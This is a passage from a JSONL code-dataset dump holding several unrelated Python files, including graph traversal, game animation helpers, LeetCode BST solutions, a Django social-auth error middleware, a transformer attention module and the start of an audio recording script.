self.chart.minimal_width)\n\n","sub_path":"libs/kv_chart.py","file_name":"kv_chart.py","file_ext":"py","file_size_in_byte":27373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"562629748","text":"def dfs_iterative(graph, start):\r\n stack, path = [start], []\r\n\r\n while stack:\r\n vertex = stack.pop()\r\n if vertex in path:\r\n continue\r\n path.append(vertex)\r\n for neighbor in graph[vertex]:\r\n stack.append(neighbor)\r\n\r\n return path\r\n\r\n\r\nadjacency_matrix = {'A': ['B', 'C'], 'B': ['D', 'E'],\r\n 'C': ['E'], 'D': ['F'], 'E': ['F'],\r\n 'F': ['G'], 'G': []}\r\n\r\nprint(dfs_iterative(adjacency_matrix, 'A'))\r\n\r\n\r\ndef countpath(self, x, neighbors):\r\n temp1 = []\r\n temp2 = []\r\n counter = 0\r\n self.pathses[counter].append(x)\r\n l = len(neighbors)\r\n if l == 1:\r\n counter = counter + 1\r\n elif l >= 3:\r\n while l >= 3:\r\n l = l - 1\r\n a = counter\r\n while (True):\r\n try:\r\n print('A ', a)\r\n if self.pathses[a + 2] != None and self.pathses[a + 1] != None:\r\n break\r\n temp1 = self.pathses[a].copy()\r\n temp2 = self.pathses[a + 1]\r\n a = a + 1\r\n except(IndexError):\r\n self.pathses.append([])\r\n\r\n node1=Node('FF1', 'FF', 3, 5, 1, True)\r\n node2=Node('AND1', 'GATE', 2)\r\n node3=Node('OR1', 'GATE', 3)\r\n node4=Node('OR2', 'GATE', 3)\r\n node5=Node('FF2', 'FF', 3, 5, 1)\r\n node6=Node('FF3', 'FF', 3, 5, 1)\r\n\r\n myCircuit=netlist()\r\n myCircuit.add(node1, node2)\r\n myCircuit.add(node2, node3, node4)\r\n myCircuit.add(node3, node5)\r\n myCircuit.add(node4, node6)\r\n myCircuit.timingAnalyze()\r\n'''\r\n def adj_matrix(self,inp:list):\r\n out=[]\r\n for x in inp:\r\n adjacency_matrix={}\r\n for node in self.nodes:\r\n if node.getnodeName() in inp and node.getnodeName()!=x:\r\n continue\r\n adjacency_matrix[node.getnodeName()]=list(self.g.neighbors(node.getnodeName()))\r\n adjacency_matrix=self.delOld(adjacency_matrix,inp,node.getnodeName())\r\n out.append(adjacency_matrix)\r\n return out\r\n'''\r\n\r\n'''adjacency_m = {}\r\n\r\n\r\ndef matrix(self, x, inp, z):\r\n if x in inp and x != z:\r\n return\r\n if x in self.adjacency_m:\r\n return\r\n neigh = list(self.g.neighbors(x))\r\n self.adjacency_m[x] = neigh\r\n for neighbors in neigh:\r\n try:\r\n self.adjacency_m.update(self.matrix(neighbors, inp, z))\r\n except:\r\n print(end='')\r\n return self.adjacency_m\r\n\r\n\r\ndef adj_matrix(self, inp: list):\r\n out = []\r\n for x in inp:\r\n self.adjacency_m.clear()\r\n adjacency_matrix = self.matrix(x, inp, x)\r\n adjacency_matrix = self.delOld(adjacency_matrix, inp, x)\r\n out.append(adjacency_matrix)\r\n return out'''","sub_path":"src/testplot.py","file_name":"testplot.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"37966196","text":"import random\r\nimport helpers\r\n\r\ndef runMethods(Engine,EngineModule,objects,animList,index,methodName,timePos):\r\n\tif \"groups\" in animList[index]:\r\n\t\tfor groupName in animList[index]['groups']:\r\n\t\t\tif groupName in objects.get():\r\n\t\t\t\tpartsList = objects.get()[groupName]\r\n\t\t\t\tfor part in partsList:\r\n\t\t\t\t\tif part:\r\n\t\t\t\t\t\tif methodName+\"-groups\" in animList[index]:\r\n\t\t\t\t\t\t\tmethods = animList[index][methodName+\"-groups\"]\r\n\t\t\t\t\t\t\tfor method in methods:\r\n\t\t\t\t\t\t\t\tmethod(Engine,EngineModule,objects,part)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tEngine.log(\"anim runMethod:\" + str(methodName) + \": part is none: \" + str(part))\r\n\r\n\tif methodName in animList[index]:\r\n\t\tmethods = animList[index][methodName]\r\n\t\tfor method in methods:\r\n\t\t\tmethod(Engine,EngineModule,objects,timePos)\r\n\r\ndef playAnimation(Engine,EngineModule,objects,animData,animList):\r\n\tanimName = animData[\"name\"]\r\n\tstartTime = animData[\"starttime\"]\r\n\tanimIndex = animData[\"index\"]\r\n\tanimListSize = len(animList)\r\n\tcurrentTime = Engine.getTime()\r\n\tif animIndex < animListSize:\r\n\t\tendTime = startTime + animList[animIndex]['time']\r\n\t\tif ((currentTime > startTime) and\r\n\t\t\t(currentTime < endTime)):\r\n\t\t\tif animIndex != 0:\r\n\t\t\t\t#print(\"run anim end: \" + str(animName) + \" index : \" + str(animIndex-1))\r\n\t\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\t\tobjects,animList,animIndex-1,\"end\",1.0)\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\t\t\t#Engine.log(\"animation start: \" + str(animName))\r\n\r\n\t\t\t#print(\"run anim start: \" + str(animName) + \" index : \" + str(animIndex))\r\n\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\tobjects,animList,animIndex,\"start\",0.0)\r\n\t\t\tanimData[\"index\"] = animIndex + 1\r\n\t\t\t#print(\"go to next anim index\")\r\n\t\t\tanimData[\"starttime\"] = endTime\r\n\t\telif currentTime > endTime:\r\n\t\t\t#Engine.log(\"animation: currentTime is bigger then endTime\")\r\n\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\tobjects,animList,animIndex,\"start\",0.0)\r\n\t\t\tanimData[\"index\"] = animIndex + 1\r\n\t\t\tanimData[\"starttime\"] = endTime\r\n\t\telse:\r\n\t\t\tif animIndex != 0:\r\n\t\t\t\toldIndex = animIndex - 1\r\n\t\t\t\toldTime = animList[oldIndex]['time']\r\n\t\t\t\toldEndTime = startTime\r\n\t\t\t\toldStartTime = startTime - oldTime\r\n\r\n\t\t\t\toldTimePos = float(currentTime - oldStartTime) / float(oldTime)\r\n\t\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\t\tobjects,animList,animIndex-1,\"timePos\",oldTimePos)\r\n\r\n\r\n\telif animIndex == animListSize:\r\n\t\tif currentTime > startTime:\r\n\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\tobjects,animList,animIndex-1,\"end\",1.0)\r\n\t\t\tanimData[\"index\"] = animIndex + 1\r\n\t\t\tanimData[\"done\"] = True\r\n\t\t\t#Engine.log(\"animation is done: \" + str(animName))\r\n\t\t\tif \"ondone\" in animData:\r\n\t\t\t\tif animData[\"ondone\"]:\r\n\t\t\t\t\tEngine.log(\"animation done: resend space release\")\r\n\t\t\t\t\tEngine.callPythonKeyReleased(EngineModule.Keys.K_SPACE)\r\n\t\telse:\r\n\t\t\toldIndex = animIndex - 1\r\n\t\t\toldTime = animList[oldIndex]['time']\r\n\t\t\toldEndTime = startTime\r\n\t\t\toldStartTime = startTime - oldTime\r\n\r\n\t\t\toldTimePos = float(currentTime - oldStartTime) / float(oldTime)\r\n\t\t\trunMethods(Engine,EngineModule,\r\n\t\t\t\tobjects,animList,animIndex-1,\"timePos\",oldTimePos)\r\n\r\n\r\n\r\n\r\ndef showBodyList(bodyList):\r\n\tnumber = 0\r\n\ttext = \"\"\r\n\tfor body in bodyList:\r\n\t\tif body:\r\n\t\t\ttext += \" \" + body.getName() + \":\"\r\n\t\t\tif body.isDynamicActor():\r\n\t\t\t\ttext += str(body.getMass())[:5]\r\n\r\n\t\t\tnumber += 1\r\n\tprint(text)\r\n\tprint(\"total bodies: \" + str(number))\r\n\r\ndef getBodyListFromGroupName(objects,groupName):\r\n\tif groupName in objects.get():\r\n\t\tbodyList = objects.get()[groupName]\r\n\t\treturn bodyList\r\n\telse:\r\n\t\treturn []\r\n\r\ndef getBodyListFromGroupNameList(objects,groupNameList):\r\n\tbodyList = []\r\n\tfor groupName in groupNameList:\r\n\t\tif groupName in objects.get():\r\n\t\t\tfor body in objects.get()[groupName]:\r\n\t\t\t\tbodyList.append(body)\r\n\treturn bodyList\r\n\r\ndef getBodyListFromNameList(Engine,EngineModule,nameList):\r\n\tbodyList = []\r\n\tfor bodyName in nameList:\r\n\t\tbody = helpers.getBodyFromName(Engine,EngineModule,bodyName)\r\n\t\tif body:\r\n\t\t\tbodyList.append(body)\r\n\treturn bodyList\r\n\t\t\r\n\r\ndef resetMasses(bodyList):\r\n\tfor body in bodyList:\r\n\t\tif body:\r\n\t\t\tif body.isActor():\r\n\t\t\t\tbody.resetMass()\r\n\r\ndef multiplyMasses(bodyList,factor):\r\n\tfor body in bodyList:\r\n\t\tif body:\r\n\t\t\tif body.isActor():\r\n\t\t\t\tnewMass = body.getMass() * factor\r\n\t\t\t\tbody.setMass(newMass)\r\n\r\ndef setMasses(bodyList,mass):\r\n\tfor body in bodyList:\r\n\t\tif body:\r\n\t\t\tif body.isActor():\r\n\t\t\t\tbody.setMass(mass)\r\n\r\ndef showMassRelationToPrev(bodyList):\r\n\ttext = \"\"\r\n\tfor i in range(0,len(bodyList)):\r\n\t\tbody = bodyList[i]\r\n\t\tif i > 0:\r\n\t\t\tprevBody = bodyList[i-1]\r\n\t\t\tmassRelation = body.getMass() / prevBody.getMass()\r\n\t\t\ttext += \" \" + body.getName() + \":\" + str(body.getMass())[:5]\r\n\t\t\ttext += \":\" + str(massRelation)[:5]\r\n\t\telse:\r\n\t\t\ttext += \" \" + body.getName() + \":\" + str(body.getMass())[:5]\r\n\tprint(text)\r\n\r\ndef showMassRelationToAll(bodyList):\r\n\ttotalMass = 0\r\n\ttext = \"\"\r\n\tfor body in bodyList:\r\n\t\ttotalMass += body.getMass()\r\n\tfor body in bodyList:\r\n\t\tmassRelation = body.getMass() / totalMass\r\n\t\ttext += \" \" + body.getName() + \":\" + str(body.getMass())[:5]\r\n\t\ttext += \":\" + str(massRelation)[:5]\r\n\tprint(text)\r\n\r\n\r\ndef approachRelationToPrev(bodyList,finalRelation,approachPercentage):\r\n\tfor i in range(0,len(bodyList)):\r\n\t\tbody = bodyList[i]\r\n\t\tif i > 0:\r\n\t\t\tprevBody = bodyList[i-1]\r\n\t\t\tmassInFinalRelation = prevBody.getMass() * finalRelation\r\n\t\t\tdiffToActualMass = massInFinalRelation - body.getMass()\r\n\t\t\tnewMass = body.getMass() + (diffToActualMass * approachPercentage)\r\n\t\t\tbody.setMass(newMass)\r\n\r\ndef approachEqualMassDistribution(bodyList,approachPercentage):\r\n\ttotalMass = 0\r\n\ttotalBodies = 0\r\n\tfor body in bodyList:\r\n\t\ttotalMass += body.getMass()\r\n\t\ttotalBodies += 1\r\n\tfor body in bodyList:\r\n\t\tmassInFinalRelation = totalMass / totalBodies\r\n\t\tdiffToActualMass = massInFinalRelation - body.getMass()\r\n\t\tnewMass = body.getMass() + (diffToActualMass * approachPercentage)\r\n\t\tbody.setMass(newMass)\r\n\r\ndef setTiming(Engine,EngineModule,objects,timePos,startFactor,endFactor):\r\n\ttimingDelta = endFactor - startFactor\r\n\ttiming = startFactor + (timingDelta * timePos)\r\n\tEngine.setTimingFactor(timing)\r\n\treturn True\r\n\r\ndef dissableCollisions(Engine,EngineModule,objects,bodyNames):\r\n\tfor name in bodyNames:\r\n\t\tif name in objects.get():\r\n\t\t\tbodyList = objects.get()[name]\r\n\t\t\tfor body in bodyList:\r\n\t\t\t\tif body.isActor():\r\n\t\t\t\t\tbody.dissableCollisions()\r\n\r\ndef enableCollisions(Engine,EngineModule,objects,bodyNames):\r\n\tfor name in bodyNames:\r\n\t\tif name in objects.get():\r\n\t\t\tbodyList = objects.get()[name]\r\n\t\t\tfor body in bodyList:\r\n\t\t\t\tif body.isActor():\r\n\t\t\t\t\tbody.enableCollisions()\r\n\r\ndef setRandomTarget(Engine,EngineModule,objects,jointNames,\r\n\tfreedomXmin, freedomXmax, freedomYmin, freedomYmax, freedomZmin, freedomZmax):\r\n\tfor name in jointNames:\r\n\t\tif name in objects.get():\r\n\t\t\tjointList = objects.get()[name]\r\n\t\t\tfor joint in jointList:\r\n\t\t\t\tif joint.isJoint():\r\n\t\t\t\t\ttarget = joint.getMotorTarget()\r\n\t\t\t\t\ttarget = EngineModule.Quat()\r\n\t\t\t\t\trandomOrientation = EngineModule.Quat().fromAngles(\r\n\t\t\t\t\t\trandom.uniform(freedomXmin,freedomXmax),\r\n\t\t\t\t\t\trandom.uniform(freedomYmin,freedomYmax),\r\n\t\t\t\t\t\trandom.uniform(freedomZmin,freedomZmax)\r\n\t\t\t\t\t\t)\r\n\t\t\t\t\t#randomOrientation = EngineModule.Quat().fromAngles(0,20,0)\r\n\t\t\t\t\tjoint.setMotorTarget(randomOrientation * target)\r\n\r\n\r\ndef findMiddlePos(Engine,EngineModule,objects):\r\n\r\n\tpartsList = objects.get()[\"head\"]\r\n\tpos = partsList[0].getPosition()\r\n\tlowX = pos.x\r\n\thighX = pos.x\r\n\tlowY = pos.y\r\n\thighY = pos.y\r\n\tlowZ = pos.z\r\n\thighZ = pos.z\r\n\tfor part in partsList:\r\n\t\tpos = part.getPosition()\r\n\t\tif pos.x < lowX:\r\n\t\t\tlowX = pos.x\r\n\t\tif pos.x > highX:\r\n\t\t\thighX = pos.x\r\n\r\n\t\tif pos.y < lowY:\r\n\t\t\tlowY = pos.y\r\n\t\tif pos.y > highY:\r\n\t\t\thighY = pos.y\r\n\r\n\t\tif pos.z < lowZ:\r\n\t\t\tlowZ = pos.z\r\n\t\tif pos.z > highZ:\r\n\t\t\thighZ = pos.z\r\n\r\n\tfinalX = highX - ((highX-lowX) * 0.5)\r\n\tfinalY = highY - ((highY-lowY) * 0.5)\r\n\tfinalZ = highZ - ((highZ-lowZ) * 0.5)\r\n\tmiddlePos = EngineModule.Vec3(finalX,finalY,finalZ)\r\n\tmiddlePos = middlePos + EngineModule.Vec3(0,10,0)\r\n\r\n\tif not \"head-debug\" in objects.get():\r\n\t\tb = Engine.createGuiBox()\r\n\t\tb.setColour(0,0,1,0.5)\r\n\t\tb.setSize(EngineModule.Vec3(10,10,10))\r\n\t\tb.setPosition(EngineModule.Vec3(0,200,0))\r\n\t\tobjects.get()[\"head-debug\"] = b\r\n\r\n\tdebug = objects.get()[\"head-debug\"]\r\n\tdebug.setPosition(middlePos)\r\n\r\n\r\ndef applyForceToDebug(Engine,EngineModule,objects,body,force=600000):\r\n\tif \"head-debug\" in objects.get():\r\n\t\tdebug = objects.get()[\"head-debug\"]\r\n\t\tdebugPositioin = debug.getPosition()\r\n\r\n\t\tangleRand = 40\r\n\r\n\t\trelVec = debugPositioin - body.getPosition()\r\n\t\trelVec.normalise()\r\n\t\trelVec = EngineModule.Quat().fromAngles(0,random.uniform(-angleRand,angleRand),0) * relVec\r\n\t\trelVec = relVec * force * random.uniform(0.1,1.0)\r\n\t\trelVec.y = 0\r\n\t\tbody.addForce(relVec)\r\n\r\ndef applyForwardForce(Engine,EngineModule,objects,body,force=60000):\r\n\trelVec = EngineModule.Vec3(-1,0,0)\r\n\trelVec = body.getOrientation() * relVec\r\n\trelVec.normalise()\r\n\trelVec = relVec * force\r\n\tbody.addForce(relVec)\r\n\r\ndef applyDownwardForce(Engine,EngineModule,objects,body,force=60000):\r\n\trelVec = EngineModule.Vec3(0,-1,0)\r\n\trelVec = body.getOrientation() * relVec\r\n\trelVec.normalise()\r\n\trelVec = relVec * force\r\n\tbody.addForce(relVec)\r\n\r\n\r\n\r\n","sub_path":"00_archive/executable_win/engine_scripts/animation_helper.py","file_name":"animation_helper.py","file_ext":"py","file_size_in_byte":9125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"99546353","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/3/27 14:15\n# @Author : LI Dongdong\n# @FileName: 501. Find Mode in Binary Search Tree.py\n''''''\n'''\n题目概述:在有重复数值的BST中,找到众数,众数可能是多个\n题目考点:BST中序遍历的性质,即数是递增的;BST中序遍历的迭代方法;dict的使用;求多个众数的思路\n解决方案:先转化为dict,再求众数;在中序遍历中,求多个众数\n方法及方法分析:dict转化法;BST的中序遍历迭代判断法\ntime complexity order: O(N)\nspace complexity order: BST的中序遍历迭代判断法 O(1) < dict转化法 O(N)\n如何考\n'''\n'''\nfind most frequenely occured elements\n\ninput:\n tree root node; node numb range? [0, +inif]; node value repeated? Y; order? BST\noutput:\n list[mode1], if have more than 1 mode, return [mode1, mode2]\ncorner case:\n root is None: -> []\n root is only one -> [root.val]\n\nA. brute force - transfer as dict and output the mode\n Method:\n 1. corner case\n 2. preorder to traversal the tree, save tree nodes and count times in dict\n 3. traversal the dict and find the mode, return\n Time complexity: O(N + N) = O(N) N is number of nodes\n Space: O(N) used in dict\n\n\n'''\n\n\nclass Solution:\n def findMode(self, root: TreeNode) -> List[int]:\n if not root: # corner case\n return []\n if not root.left and not root.right:\n return [root.val]\n\n def transfer(root, node): # use dict to save all node val and return\n if not root:\n return {}\n\n if root.val not in node:\n node[root.val] = 1\n else:\n node[root.val] += 1\n\n transfer(root.left, node)\n transfer(root.right, node)\n\n def findMode(nodes): # return the modes in nodes dict\n if not nodes:\n return []\n\n maxTime = 0\n res = []\n for key, value in nodes.items():\n if value < maxTime:\n pass\n elif value == maxTime:\n res.append(key)\n else:\n res = [key]\n maxTime = value\n return res\n\n node = {}\n transfer(root, node)\n res = findMode(node)\n return res\n\n\n'''\nB. inorder traversal the tree - count the time\n Method:\n 1. corner case\n 2. inorder traversal the tree by iteration method\n a. use ans list save [mode], record maxTimes, preNode, times\n b. renew the ans list\n 3. return \n Time: O(N) \n Space: O(1)\n\n易错点:\n 1. 不要用复杂的变量命名,尤其是带s等,容易错,所以都不要带\n 2. 修改代码时,要注意改完的代码和之前的变量命名是否一致\n 3. 本题思路:先记录time,在比对max和time进行res值的替换\n'''\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def findMode(self, root: TreeNode) -> List[int]:\n if not root: # corner case\n return []\n if not root.left and not root.right:\n return [root.val]\n\n ans = []\n maxTimes = 0\n pre = TreeNode(float('-inf'))\n times = 0 # cur node appear times\n\n stack = []\n while stack or root:\n while root:\n stack.append(root)\n root = root.left\n\n cur = stack.pop()\n\n if cur.val == pre.val: # record times\n times += 1\n else:\n times = 1\n\n if maxTimes < times:\n ans = [cur.val]\n maxTimes = times\n elif maxTimes == times:\n ans.append(cur.val)\n else:\n pass\n\n pre = cur\n\n if cur.right:\n root = cur.right\n return ans\n","sub_path":"Binary Search Tree 二叉搜索树/501. Find Mode in Binary Search Tree.py","file_name":"501. Find Mode in Binary Search Tree.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"214016333","text":"import unittest\nimport sys\nsys.path.append(\"../src/\")\nfrom maximum_subarray import maximum_diff_brute_force\nfrom maximum_subarray import maximum_diff_divide_and_conquer\nfrom maximum_subarray import maximum_diff_dynamic_programming\nfrom random import randint\n\n\nclass TestMaximumSubarray(unittest.TestCase):\n def test_maximum_diff_divide_and_conquer(self):\n \"\"\" 分割統治法の結果が総当たり法の結果と一致することを確認する。 \n 最大部分配列は複数存在するかもしれないので、部分和だけ確認する。\n \"\"\"\n A = [randint(0, 100) for _ in range(100)]\n (_, _, max_diff1) = maximum_diff_brute_force(A)\n (_, _, max_diff2) = maximum_diff_divide_and_conquer(A)\n self.assertEqual(max_diff1, max_diff2)\n\n def test_maximum_diff_dynamic_programming(self):\n \"\"\" kadaneのアルゴリズムの結果が総当たり法の結果と一致することを確認する。 \n 最大部分配列は複数存在するかもしれないが、どちらも最も左に存在するものの情報を \n 返すので、結果が全て一致するか確認できる。\n \"\"\"\n A = [randint(0, 100) for _ in range(100)]\n result1 = maximum_diff_brute_force(A)\n result2 = maximum_diff_dynamic_programming(A)\n self.assertEqual(result1, result2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"Ch04/test/maximum_subarray_test.py","file_name":"maximum_subarray_test.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"225092313","text":"\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nimport json\n\nURL_PARAMETERS = ['error','error_description','error_code','error_message','denied'] #commom error paramters in social media error url\nclass SauthExceptionMiddleware(object):\n\tdef process_request(self,request):\n\t\trg = request.GET.get\n\t\tif rg('denied') or rg('error') or rg('error_description') or rg('error_code') or rg('error_message') in URL_PARAMETERS :\n\t\t\tbackend = request.session['backend']\t\t\t\n\t\t\tstatus = rg(\"error\")\n\t\t\tif rg('error_description'):\n\t\t\t\tmessage = rg('error_description')\n\t\t\telif rg('error_message'):\n\t\t\t \tmessage = rg('error_message')\n\t\t\telif rg('denied'):\n\t\t\t\tmessage = \"Key 'oauth_verifier' is not found\"\n\t\t\treason1 = \"User canceled the authentication with %s\" %(backend)\n\t\t\tif rg('error'):\n\t\t\t\tstatus = rg('error')\n\t\t\t\tmessage = rg('error')\n\t\t\telif rg('error_code'):\n\t\t\t\tstatus = rg('error_code')\n\t\t\telif rg('denied'):\n\t\t\t\tstatus = rg('denied')\n\n\t\t\t'''\n\t\t\tThe error temporarly store in to the user session , if \"SAUTH_LOGIN_ERROR_URL=True\", you can \n\t\t\tget the error in your view function using in the session keys[error_status,error_reason,error_desc]\n\t\t\t'''\n\t\t\t\n\t\t\trequest.session['error_status'] = status\n\t\t\trequest.session['error_reason'] = reason1\n\t\t\trequest.session['error_desc'] = message\n\t\t\terror_url = getattr(settings, 'SAUTH_LOGIN_ERROR_URL', '')\n\t\t\tif error_url == '' or None:\n\t\t\t\treturn HttpResponse(json.dumps({\"error\":status,'message':message,'reason':reason1}))\n\t\t\telse:\n\t\t\t\treturn HttpResponseRedirect(reverse(error_url))\n\t\t\t\n\n\n\t\t\t\t","sub_path":"sauth/middleware/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"633252513","text":"#\"\"Joe's GUI program in Python\"\"\r\n\r\n#import from livewires graphic package\r\nfrom livewires import games, color\r\n\r\n\r\n#Making the pizzas bounce, making a derived class, and overriding the update method\r\nclass Pizza(games.Sprite): #Base class of Sprite\r\n \"\"\"A Bouncing Pizza.\"\"\"\r\n \r\n def update(self):\r\n \"\"\"Reverse a velocity component if edge of screen reached.\"\"\"\r\n if self.right > games.screen.width or self.left < 0:\r\n self.dx = -self.dx\r\n \r\n if self.bottom > games.screen.height or self.top < 0:\r\n self.dy = -self.dy\r\n\r\n\r\n#Now adding on the Pan class, so that I can use mouse-input to update Pan position\r\nclass Pan(games.Sprite):\r\n \"\"\"A Pan controlled by the mouse\"\"\"\r\n \r\n def update(self):\r\n \"\"\"Move the Mouse coordiantes\"\"\"\r\n self.x = games.mouse.x\r\n self.y = games.mouse.y\r\n \r\n \r\n# MAIN:\r\ndef main():\r\n # create window\r\n games.init(screen_width = 640, screen_height = 480, fps =50)\r\n\r\n #Load background\r\n #still has problem if we give absolute path, i.e.\"C:\\lkjlfs\\dfdsfs\"\r\n wall_image = games.load_image(\"CIMG2622.JPG\", transparent = False)\r\n games.screen.background = wall_image\r\n\r\n # Add on additional sprite, animation object\r\n #~ cxtree_image = games.load_image(\"cxmastree.bmp\")\r\n #~ xtree = games.Sprite(image = cxtree_image, x = 320, y=240)\r\n #~ games.screen.add(xtree)\r\n\r\n # Add on 3 pizzas for 3 girls\r\n p_image = games.load_image(\"pizza.bmp\")\r\n #~ pizza1 = games.Sprite(image = p_image, x = 470, y=280, dx =1, dy =-1)\r\n #~ pizza2 = games.Sprite(image = p_image, x = 240, y=280, dx = -1, dy =-1)\r\n #~ pizza3 = games.Sprite(image = p_image, x = 320, y=280, dx =-1, dy =1)\r\n \r\n #Now calling derived class Pizza to make them bounce via over-ride update method.\r\n pizza1 = Pizza(image = p_image, x = 470, y=280, dx =1, dy =-1)\r\n pizza2 = Pizza(image = p_image, x = 240, y=280, dx = -1, dy =-1)\r\n pizza3 = Pizza(image = p_image, x = 320, y=280, dx =-1, dy =1)\r\n games.screen.add(pizza1)\r\n games.screen.add(pizza2)\r\n games.screen.add(pizza3)\r\n\r\n # Display the girls' names as Text and Color demo\r\n amita = games.Text(value = \"Amita\",\r\n size = 20,\r\n color = color.blue,\r\n x= 240,\r\n y= 310)\r\n \r\n \r\n anika = games.Text(value = \"Anika\",\r\n size = 20,\r\n color = color.pink,\r\n x= 470,\r\n y= 310)\r\n \r\n\r\n alina = games.Text(value = \"Alina\",\r\n size = 20,\r\n color = color.yellow,\r\n x= 320,\r\n y= 310)\r\n \r\n \r\n games.screen.add(amita)\r\n games.screen.add(anika)\r\n games.screen.add(alina)\r\n\r\n #Display \"Dinner Time\" as Message demo\r\n eatMessage = games.Message(value = \"Dinner Time!!!\",\r\n size = 40,\r\n color = color.red,\r\n x = games.screen.width/2,\r\n y = games.screen.height/2,\r\n lifetime = 250,\r\n after_death = games.screen.mainloop)\r\n\r\n games.screen.add(eatMessage)\r\n\r\n #Create Pan sprite and add to screen.\r\n pan_image = games.load_image(\"pan.bmp\")\r\n pan = Pan(image = pan_image, \r\n x = games.mouse.x,\r\n y = games.mouse.y)\r\n \r\n games.screen.add(pan)\r\n \r\n #Setting mouse pinter not visible\r\n games.mouse.is_visible = False\r\n \r\n #Grab all graphic events\r\n games.screen.event_grab = True\r\n \r\n #Load music file playing as background\r\n games.music.load(\"theme.mid\")\r\n games.music.play()\r\n \r\n #Load a sound file for use in case of collision, etc...\r\n missile_sound = games.load_sound(\"missile.wav\")\r\n loop = 9999\r\n #missile_sound.play(loop) #continuous\r\n \r\n \r\n #Display window on screen\r\n games.screen.mainloop()\r\n\r\n\r\n#Launch Main()\r\nmain()\r\npause ","sub_path":"Python/JoePythonGame/JoeS_Python_GUI_Rev1.py","file_name":"JoeS_Python_GUI_Rev1.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"27003053","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\n__author__ = \"Yu-Hsiang Huang\"\n\nclass ScaledDotProductAttention(nn.Module):\n ''' Scaled Dot-Product Attention '''\n\n def __init__(self, temperature, attn_dropout=0.1):\n super().__init__()\n self.temperature = temperature # 分母\n self.dropout = nn.Dropout(attn_dropout)\n self.softmax = nn.Softmax(dim=2)\n\n def forward(self, q, k, v, mask=None):\n # q shape: (heads*batch) x len x dk\n # k shape: (heads*batch) x len x dk\n # v shape: (heads*batch) x len x dv\n # mask shape: heads*batch_size, len, len\n\n # q 乘 k 转置, attn shape: heads*batch, len, len\n # 那么在每一个batch位,都是一个len*len的方阵,\n # 每一行表示该len位的query结果,即该位置单词和所有单词attention系数\n # 所以,以行为单位,可以理解为 准备好的value的系数\n attn = torch.bmm(q, k.transpose(1, 2))\n attn = attn / self.temperature\n\n if mask is not None:\n # mask shape: heads * batch_size, len, len\n # 另外,由于句子的末端,也就是len位比较大的地方,可能是pading的结果\n # 所以,这些位置注意力得分应该为-inf,具体分析如下:\n # 假如句子长度为4,最后一个位置为padding的话就是\n # T T T F\n # T T T F\n # T T T F\n # T T T F\n # 这样以来,说明position4位padidng的位置,接下来mask_fill所有的\n # F为-inf,然后再按照dim=2,进行softmax,那么F的位置能够分到的\n # 权重为0\n # 将该是-inf的位置 填充\n attn = attn.masked_fill(mask, -np.inf)\n\n # attn:heads*batch_size, len, len 现在dim=2\n attn = self.softmax(attn)\n attn = self.dropout(attn) # 某些位置随即为0\n\n # attn shape: batch*heads, len_q, len_q\n # v/output的 shape: heads*batch, len_v, dv\n # 实际上就是 s, s, dv,每一行的结果都屏蔽了pdding的value位\n # 但是由于本身padding的几行仍然有数据,所以out_put的后几行\n # 可能是无效的,这就需要出去后,硬截断。\n output = torch.bmm(attn, v)\n return output, attn\n\n","sub_path":"transFormerSummarization/transformer/Modules.py","file_name":"Modules.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"437961454","text":"class frase_letra():\n def __init__(self):\n self.lista=''\n self.letra=''\n \n def encontrar(self):\n self.lista=input(\"ingrese una frase\\n\")\n self.letra=input(\"ingrese una letra\\n\")\n n=0\n for i in self.lista:\n if i == self.letra:\n n=n+1\n print(\"la cantidad de veces que se repite esa letra es\", str(n))\n \n\nlet=frase_letra()\n\nlet.encontrar()\n\n\n\n\n\n\n\n","sub_path":"Tp1/ej7.py","file_name":"ej7.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"208225132","text":"import pyaudio\nimport wave\n#from multiprocessing import Process, Queue\nimport time\nfrom threading import Thread\nimport Queue\nCHUNK = 1024\nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\n#this line was edited by slobacartoonac@hotmail.com\nWAVE_OUTPUT_FILENAME = \"atmp.wav\"\n#\n\n#his line too\ndef record(q):\n p = pyaudio.PyAudio()\n q.put(1)\n time.sleep(1);\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n print(\"* recording\")\n\n frames = []\n pi=1\n \n while 1:\n data = stream.read(CHUNK)\n frames.append(data)\n try:\n pi=q.get_nowait()\n if(pi==-1):\n break;\n except:\n pi=pi\n \n\n print(\"* done recording\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n \n wf = 